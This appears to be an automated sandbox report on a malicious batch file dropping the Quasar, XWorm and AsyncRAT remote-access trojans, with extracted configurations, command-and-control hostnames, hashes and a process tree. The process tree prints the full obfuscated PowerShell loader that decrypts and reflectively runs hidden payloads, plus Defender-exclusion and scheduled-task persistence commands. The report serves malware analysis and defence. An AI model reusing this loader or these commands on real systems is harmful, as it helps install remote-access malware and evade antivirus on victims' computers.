Analysis
- max time kernel: 149s
- max time network: 152s
- platform: windows10-2004_x64
- resource: win10v2004-20240611-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240611-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 02-07-2024 13:15
- Static task: static1
General
- Target: svchost.bat
- Size: 608KB
- MD5: 0598b47f8cba2aa8042d5241594a2a18
- SHA1: 2f9923a0cd52476a33e005156675c19d445a627f
- SHA256: edd1a3237614dc5b6554baaf7f937285850b22b294bfe506309549cb4f62984e
- SHA512: 146fb2f4ba190434ac42c22054c992fd4276da789145401fab9702e3e8cb140194be5c49bc00b20de58557f0d3e4425e80029113fc2cd55dcdc5dbb59306ccd1
- SSDEEP: 12288:NK2Dh0mFsRXQ7ZpK1b4Bdbi6EGv8/K9yxnQ3nzvc7l87wrJJ3HMU:Nhjsxb4B0KAxnww7y7+v
Malware Config

Extracted: quasar
- reconnect_delay: 3000

Extracted: xworm
- super-nearest.gl.at.ply.gg:17835
- best-bird.gl.at.ply.gg:27196
- wiz.bounceme.net:6000
- Install_directory: %ProgramData%

Extracted: asyncrat
- Default
- finally-grande.gl.at.ply.gg:25844
- delay: 1
- install: false
- install_folder: %AppData%

Extracted: quasar
- 3.1.5
- Slave
- stop-largely.gl.at.ply.gg:27116
- $Sxr-kl1r656AGsPQksTmi8
- encryption_key: WyBm1iVkHZmEnGPMAZWV
- install_name: $phantom.exe
- log_directory: Logs
- reconnect_delay: 3000
- startup_key: $phantomSTARTUP~MSF
- subdirectory: $phantom
Signatures

- Detect Xworm Payload (5 IoCs)
  resource | yara_rule
  behavioral1/memory/1248-16-0x000001E19F3C0000-0x000001E19F476000-memory.dmp | family_xworm
  behavioral1/memory/4720-59-0x0000026E76B80000-0x0000026E76B98000-memory.dmp | family_xworm
  C:\Users\Admin\AppData\Local\Temp\7zip.exe | family_xworm
  behavioral1/memory/2416-99-0x0000000000A60000-0x0000000000A7A000-memory.dmp | family_xworm
  behavioral1/memory/2416-201-0x0000000002C80000-0x0000000002C8E000-memory.dmp | family_xworm

- Quasar payload (3 IoCs)
  resource | yara_rule
  behavioral1/memory/1248-16-0x000001E19F3C0000-0x000001E19F476000-memory.dmp | family_quasar
  C:\Users\Admin\AppData\Local\Temp\wininit.exe | family_quasar
  behavioral1/memory/2196-103-0x0000000000A40000-0x0000000000AAC000-memory.dmp | family_quasar

- Async RAT payload (2 IoCs)
  resource | yara_rule
  behavioral1/memory/1248-16-0x000001E19F3C0000-0x000001E19F476000-memory.dmp | family_asyncrat
  C:\Users\Admin\AppData\Local\Temp\conhost.exe | family_asyncrat

- Blocklisted process makes network request (2 IoCs)
  flow | pid | process
  39 | 4720 | powershell.exe
  48 | 4720 | powershell.exe

- Command and Scripting Interpreter: PowerShell (1 TTPs, 10 IoCs)
  Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
  pid | process
  4388 | powershell.exe
  4956 | powershell.exe
  4728 | powershell.exe
  3152 | powershell.exe
  3432 | powershell.exe
  2060 | powershell.exe
  2236 | powershell.exe
  4720 | powershell.exe
  1248 | powershell.exe
  4348 | powershell.exe

- Checks computer location settings (2 TTPs, 2 IoCs)
  Looks up country code configured in the registry, likely geofence.
  description | ioc | process
  Key value queried | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation | WScript.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation | 7zip.exe

- Drops startup file (2 IoCs)
  description | ioc | process
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7zip.lnk | 7zip.exe
  File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7zip.lnk | 7zip.exe

- Executes dropped EXE (7 IoCs)
  pid | process
  2148 | Windows PowerShell.exe
  2416 | 7zip.exe
  4536 | conhost.exe
  2196 | wininit.exe
  3008 | 7zip.exe
  1348 | 7zip.exe
  3312 | 7zip.exe

- Adds Run key to start application (2 TTPs, 2 IoCs)
  description | ioc | process
  Set value (str) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\7zip = "C:\\ProgramData\\7zip.exe" | 7zip.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WINDOWSBIOS = "C:\\ProgramData\\WINDOWSBIOS .COM" | powershell.exe

- Looks up external IP address via web service (1 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow | ioc
  18 | ip-api.com

- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).

- Modifies registry class (1 IoCs)
  description | ioc | process
  Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings | powershell.exe

- Scheduled Task/Job: Scheduled Task (1 TTPs, 3 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid | process
  3412 | schtasks.exe
  3468 | schtasks.exe
  2564 | schtasks.exe

- Suspicious behavior: EnumeratesProcesses (64 IoCs)
  pid | process
  1248 | powershell.exe (2 entries)
  4348 | powershell.exe (2 entries)
  4720 | powershell.exe (2 entries)
  2148 | Windows PowerShell.exe (all remaining entries, 58 of the 64)

- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  description | pid | process
  Token: SeDebugPrivilege | 1248 | powershell.exe
  Token: SeDebugPrivilege | 4348 | powershell.exe
  The following 21-token sequence then repeats for pid 4348 (powershell.exe) three times; the third repetition stops after token 35, which gives the 64 entries:
  SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36

- Suspicious use of SetWindowsHookEx (3 IoCs)
  pid | process
  2196 | wininit.exe
  4720 | powershell.exe
  2416 | 7zip.exe

- Suspicious use of WriteProcessMemory (45 IoCs)
  source pid | source process | target pid | target process | entries
  1552 | cmd.exe | 3220 | cmd.exe | 2
  1552 | cmd.exe | 1248 | powershell.exe | 2
  1248 | powershell.exe | 4348 | powershell.exe | 2
  1248 | powershell.exe | 3060 | WScript.exe | 2
  3060 | WScript.exe | 4832 | cmd.exe | 2
  4832 | cmd.exe | 2428 | cmd.exe | 2
  4832 | cmd.exe | 4720 | powershell.exe | 2
  4720 | powershell.exe | 2148 | Windows PowerShell.exe | 3
  4720 | powershell.exe | 2416 | 7zip.exe | 2
  4720 | powershell.exe | 4536 | conhost.exe | 2
  4720 | powershell.exe | 2196 | wininit.exe | 3
  2196 | wininit.exe | 3468 | schtasks.exe | 3
  2416 | 7zip.exe | 4388 | powershell.exe | 2
  2416 | 7zip.exe | 4956 | powershell.exe | 2
  2416 | 7zip.exe | 4728 | powershell.exe | 2
  4720 | powershell.exe | 3152 | powershell.exe | 2
  4720 | powershell.exe | 3432 | powershell.exe | 2
  4720 | powershell.exe | 2060 | powershell.exe | 2
  4720 | powershell.exe | 2236 | powershell.exe | 2
  2416 | 7zip.exe | 2564 | schtasks.exe | 2
  4720 | powershell.exe | 3412 | schtasks.exe | 2

- Uses Task Scheduler COM API (1 TTPs)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes (indented by process-tree depth; the depth number from the report is given in brackets)

- [1] C:\Windows\system32\cmd.exe
  cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\svchost.bat"
  signatures: Suspicious use of WriteProcessMemory
  - [2] C:\Windows\system32\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bhgsIZ9ntR3QuSTVrlc5WGQlDCUzkxlFUOsGaWn8ZvI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('noHuYoYEf1PqzBYbzxQgMQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ktoSe=New-Object System.IO.MemoryStream(,$param_var); $bKMAR=New-Object System.IO.MemoryStream; $edDvw=New-Object System.IO.Compression.GZipStream($ktoSe, [IO.Compression.CompressionMode]::Decompress); $edDvw.CopyTo($bKMAR); $edDvw.Dispose(); $ktoSe.Dispose(); $bKMAR.Dispose(); $bKMAR.ToArray();}function execute_function($param_var,$param2_var){ $lunRh=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $UKjYh=$lunRh.EntryPoint; $UKjYh.Invoke($null, $param2_var);}$GUFyk = 'C:\Users\Admin\AppData\Local\Temp\svchost.bat';$host.UI.RawUI.WindowTitle = $GUFyk;$AaqEv=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GUFyk).Split([Environment]::NewLine);foreach ($YpNpy in $AaqEv) { if ($YpNpy.StartsWith('HstmKcMNumVqNXjUlxly')) { $PHZNA=$YpNpy.Substring(20); break; }}$payloads_var=[string[]]$PHZNA.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
  - [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    signatures: Command and Scripting Interpreter: PowerShell; Modifies registry class; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_876_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_876.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - [3] C:\Windows\System32\WScript.exe
      cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_876.vbs"
      signatures: Checks computer location settings; Suspicious use of WriteProcessMemory
      - [4] C:\Windows\system32\cmd.exe
        cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_876.bat" "
        signatures: Suspicious use of WriteProcessMemory
        - [5] C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bhgsIZ9ntR3QuSTVrlc5WGQlDCUzkxlFUOsGaWn8ZvI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('noHuYoYEf1PqzBYbzxQgMQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ktoSe=New-Object System.IO.MemoryStream(,$param_var); $bKMAR=New-Object System.IO.MemoryStream; $edDvw=New-Object System.IO.Compression.GZipStream($ktoSe, [IO.Compression.CompressionMode]::Decompress); $edDvw.CopyTo($bKMAR); $edDvw.Dispose(); $ktoSe.Dispose(); $bKMAR.Dispose(); $bKMAR.ToArray();}function execute_function($param_var,$param2_var){ $lunRh=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $UKjYh=$lunRh.EntryPoint; $UKjYh.Invoke($null, $param2_var);}$GUFyk = 'C:\Users\Admin\AppData\Roaming\Windows_Log_876.bat';$host.UI.RawUI.WindowTitle = $GUFyk;$AaqEv=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GUFyk).Split([Environment]::NewLine);foreach ($YpNpy in $AaqEv) { if ($YpNpy.StartsWith('HstmKcMNumVqNXjUlxly')) { $PHZNA=$YpNpy.Substring(20); break; }}$payloads_var=[string[]]$PHZNA.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        - [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
          signatures: Blocklisted process makes network request; Command and Scripting Interpreter: PowerShell; Adds Run key to start application; Suspicious behavior: EnumeratesProcesses; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
          - [6] C:\Users\Admin\AppData\Local\Temp\Windows PowerShell.exe
            cmdline: "C:\Users\Admin\AppData\Local\Temp\Windows PowerShell.exe"
            signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses
          - [6] C:\Users\Admin\AppData\Local\Temp\conhost.exe
            cmdline: "C:\Users\Admin\AppData\Local\Temp\conhost.exe"
            signatures: Executes dropped EXE
          - [6] C:\Users\Admin\AppData\Local\Temp\7zip.exe
            cmdline: "C:\Users\Admin\AppData\Local\Temp\7zip.exe"
            signatures: Checks computer location settings; Drops startup file; Executes dropped EXE; Adds Run key to start application; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
            - [7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7zip.exe'
              signatures: Command and Scripting Interpreter: PowerShell
            - [7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '7zip.exe'
              signatures: Command and Scripting Interpreter: PowerShell
            - [7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\7zip.exe'
              signatures: Command and Scripting Interpreter: PowerShell
            - [7] C:\Windows\System32\schtasks.exe
              cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "7zip" /tr "C:\ProgramData\7zip.exe"
              signatures: Scheduled Task/Job: Scheduled Task
          - [6] C:\Users\Admin\AppData\Local\Temp\wininit.exe
            cmdline: "C:\Users\Admin\AppData\Local\Temp\wininit.exe"
            signatures: Executes dropped EXE; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
            - [7] C:\Windows\SysWOW64\schtasks.exe
              cmdline: "schtasks" /create /tn "$phantomSTARTUP~MSF" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\wininit.exe" /rl HIGHEST /f
              signatures: Scheduled Task/Job: Scheduled Task
          - [6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
            signatures: Command and Scripting Interpreter: PowerShell
          - [6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
            signatures: Command and Scripting Interpreter: PowerShell
          - [6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\WINDOWSBIOS .COM'
            signatures: Command and Scripting Interpreter: PowerShell
          - [6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WINDOWSBIOS .COM'
            signatures: Command and Scripting Interpreter: PowerShell
          - [6] C:\Windows\System32\schtasks.exe
            cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WINDOWSBIOS " /tr "C:\ProgramData\WINDOWSBIOS .COM"
            signatures: Scheduled Task/Job: Scheduled Task
- [1] C:\ProgramData\7zip.exe
  cmdline: C:\ProgramData\7zip.exe
  signatures: Executes dropped EXE
- [1] C:\ProgramData\7zip.exe
  cmdline: C:\ProgramData\7zip.exe
  signatures: Executes dropped EXE
- [1] C:\ProgramData\7zip.exe
  cmdline: C:\ProgramData\7zip.exe
  signatures: Executes dropped EXE
Network

MITRE ATT&CK Matrix (ATT&CK v13)
- Execution
  - Command and Scripting Interpreter (1): PowerShell (1)
  - Scheduled Task/Job (1): Scheduled Task (1)
- Persistence
  - Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
  - Scheduled Task/Job (1): Scheduled Task (1)
Downloads

- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\7zip.exe.log
  Filesize: 654B
  MD5: 2ff39f6c7249774be85fd60a8f9a245e
  SHA1: 684ff36b31aedc1e587c8496c02722c6698c1c4e
  SHA256: e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
  SHA512: 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 3KB
  MD5: 661739d384d9dfd807a089721202900b
  SHA1: 5b2c5d6a7122b4ce849dc98e79a7713038feac55
  SHA256: 70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
  SHA512: 81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
  Filesize: 2KB
  MD5: 005bc2ef5a9d890fb2297be6a36f01c2
  SHA1: 0c52adee1316c54b0bfdc510c0963196e7ebb430
  SHA256: 342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d
  SHA512: f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22

- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: ade8b780188478d4bf68c97bc995b06f
  SHA1: 0b5124fca500da8f833a3be98bd5f732d3962343
  SHA256: 318ce58720b7608811b1177c41ce0f7ec0437783db8ed188acbc523d08a3646b
  SHA512: c9d19f196b25e62bb6f717c46ec892b18d243646afdae4b848ce30802d1df4e5576bf6328ac88ce8bca01f17fed79da778ecfeb770fe0bcc14d167ad577fcc13

- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: 6d42b6da621e8df5674e26b799c8e2aa
  SHA1: ab3ce1327ea1eeedb987ec823d5e0cb146bafa48
  SHA256: 5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c
  SHA512: 53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: 72903459f297d1561ed59e88f6266c39
  SHA1: 22275691405b29149354de4bf3a40bd7cef6f6de
  SHA256: 34dd19ebba6598d5f586b5c7ac30babf89d055b5f1a6e959129a39311fe4026b
  SHA512: 6c04ccf522b8b544de9da57b791e7f4a3ff1de200f8a641de106f75270759e04ba028fd6db7e3784bb0233ac3c1f92ec3473d703b9ac585d4851d277d12db10f

- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: 62d94562013cad250e309b4091503254
  SHA1: f658f6e53e980694f5ff5bae10455c21ee059a2e
  SHA256: 1ff2d02730e490230262e82169d667b1db011b405f53b3bb4345ed1ee3efc1d5
  SHA512: 282e6777407b759ba15e7410cefc8652ae362a5e9ae13dfb355a3044154ca018a8de2b98df0e83012ae98279480ee3b517c62d33c8122f078ea5f3732aaa2a97

- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: 34f595487e6bfd1d11c7de88ee50356a
  SHA1: 4caad088c15766cc0fa1f42009260e9a02f953bb
  SHA256: 0f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d
  SHA512: 10976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b

- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: 22310ad6749d8cc38284aa616efcd100
  SHA1: 440ef4a0a53bfa7c83fe84326a1dff4326dcb515
  SHA256: 55b1d8021c4eb4c3c0d75e3ed7a4eb30cd0123e3d69f32eeb596fe4ffec05abf
  SHA512: 2ef08e2ee15bb86695fe0c10533014ffed76ececc6e579d299d3365fafb7627f53e32e600bb6d872b9f58aca94f8cb7e1e94cdfd14777527f7f0aa019d9c6def

- C:\Users\Admin\AppData\Local\Temp\7zip.exe
  Filesize: 81KB
  MD5: 6fac9c3612488908d9aa6ed9e8234f9f
  SHA1: 8b36017162e06e76a450e2ecceee4d3a68bb3905
  SHA256: 0ca49b53ed70a9fabe46a92daa4a134f1afaf99b9098f81e33084a95c8586606
  SHA512: e71b4cef4f488fc2cc771c1df5466ed6edd12d5cf3bfcf2825f0ec87bbcb66afabcba957dbfeee621e3c03e897bec1cede8d88f3c9e255b4fd40ddbdfaa5794e

- C:\Users\Admin\AppData\Local\Temp\Windows PowerShell.exe
  Filesize: 27KB
  MD5: 4daae2de5a31125d02b057c1ff18d58f
  SHA1: e1d603edfcc150a4718e2916ae3dda3aa9548dc8
  SHA256: 25510f3aa1b879ea92a3cba9583d73e447b8765bae6dfcc4954bb72df5beaa7f
  SHA512: 7cda96a69f9cddab307f3f08e1f38a4d059f0cc7f7119d4a48891efdb01cf101ebcc06cb2ce0702ea2d689d27ee45faddc0a13cd72503c609c4e544919549a2a

- C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kksidhr4.4rq.ps1
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

- C:\Users\Admin\AppData\Local\Temp\conhost.exe
  Filesize: 63KB
  MD5: ec57b49d155e05d971f73e2eb3d3d01f
  SHA1: f8537e9b44342a71f1f8bf48548b27574f17ff7c
  SHA256: baf3237f6c2b6c49ca7572213bc72f0dea9a4afcd37f90ea2d13a542d83d2a9c
  SHA512: e27191657d4339d44dfb32a637efe1168d57520ee1c320dc7997f8944c627595e66abe72ed5039f005b01e2e2d1a5ca9df7c5a10ad0092305c07dd64f29ff533

- C:\Users\Admin\AppData\Local\Temp\wininit.exe
  Filesize: 409KB
  MD5: 301613f1fcda48ebade4c197175be1a0
  SHA1: 03f58ab72f3c2d991418861adfc9c3b3289640a0
  SHA256: 1772f8bfc84772485e5b2388bb8942c28a9f2803a5f879e275d9b9d3eb923d41
  SHA512: 375c55fc09f1f0ef1a394b57f38916f103c36aaf8f4ec9a6939dcfaf147ebc3121537f2ebe1061b3851043dd44001f0a6630abe8e32549bf95d3e12f81308525

- C:\Users\Admin\AppData\Roaming\Windows_Log_876.bat
  Filesize: 608KB
  MD5: 0598b47f8cba2aa8042d5241594a2a18
  SHA1: 2f9923a0cd52476a33e005156675c19d445a627f
  SHA256: edd1a3237614dc5b6554baaf7f937285850b22b294bfe506309549cb4f62984e
  SHA512: 146fb2f4ba190434ac42c22054c992fd4276da789145401fab9702e3e8cb140194be5c49bc00b20de58557f0d3e4425e80029113fc2cd55dcdc5dbb59306ccd1

- C:\Users\Admin\AppData\Roaming\Windows_Log_876.vbs
  Filesize: 115B
  MD5: 995831d3bba7837f1b3acc03ffe50c25
  SHA1: 4223009495a9b47c997162b78bff72c7f4323b57
  SHA256: 465374b758b74b4f969922fa248fcd7d7b83ceade999a21f8c0dacc0787d43f7
  SHA512: 8e12d3372570310e6e0a06d639bd12264efebce809f0f17d9c2ad5bb7a6c79775a975c871e2f8274b23033c3d680f314909cde1465a84b0f86a517d0d42606ed

Memory dumps (path | Filesize)
- memory/1248-50-0x00007FFA20520000-0x00007FFA20FE1000-memory.dmp | 10.8MB
- memory/1248-15-0x000001E19CE00000-0x000001E19CE08000-memory.dmp | 32KB
- memory/1248-11-0x00007FFA20520000-0x00007FFA20FE1000-memory.dmp | 10.8MB
- memory/1248-12-0x00007FFA20520000-0x00007FFA20FE1000-memory.dmp | 10.8MB
- memory/1248-13-0x000001E19F270000-0x000001E19F2B4000-memory.dmp | 272KB
- memory/1248-14-0x000001E19F340000-0x000001E19F3B6000-memory.dmp | 472KB
- memory/1248-6-0x000001E19CDB0000-0x000001E19CDD2000-memory.dmp | 136KB
- memory/1248-16-0x000001E19F3C0000-0x000001E19F476000-memory.dmp | 728KB
- memory/1248-0-0x00007FFA20523000-0x00007FFA20525000-memory.dmp | 8KB
- memory/2148-104-0x0000000001840000-0x0000000001850000-memory.dmp | 64KB
- memory/2148-102-0x0000000000F00000-0x0000000000F0E000-memory.dmp | 56KB
- memory/2196-108-0x0000000005430000-0x0000000005496000-memory.dmp | 408KB
- memory/2196-123-0x0000000006CC0000-0x0000000006CCA000-memory.dmp | 40KB
- memory/2196-106-0x0000000005380000-0x0000000005412000-memory.dmp | 584KB
- memory/2196-103-0x0000000000A40000-0x0000000000AAC000-memory.dmp | 432KB
- memory/2196-109-0x0000000006090000-0x00000000060A2000-memory.dmp | 72KB
- memory/2196-110-0x00000000065D0000-0x000000000660C000-memory.dmp | 240KB
- memory/2196-105-0x00000000059E0000-0x0000000005F84000-memory.dmp | 5.6MB
- memory/2416-99-0x0000000000A60000-0x0000000000A7A000-memory.dmp | 104KB
- memory/2416-201-0x0000000002C80000-0x0000000002C8E000-memory.dmp | 56KB
- memory/4348-32-0x00007FFA20520000-0x00007FFA20FE1000-memory.dmp | 10.8MB
- memory/4348-29-0x00007FFA20520000-0x00007FFA20FE1000-memory.dmp | 10.8MB
- memory/4348-28-0x00007FFA20520000-0x00007FFA20FE1000-memory.dmp | 10.8MB
- memory/4348-18-0x00007FFA20520000-0x00007FFA20FE1000-memory.dmp | 10.8MB
- memory/4536-97-0x0000000000120000-0x0000000000136000-memory.dmp | 88KB
- memory/4720-59-0x0000026E76B80000-0x0000026E76B98000-memory.dmp | 96KB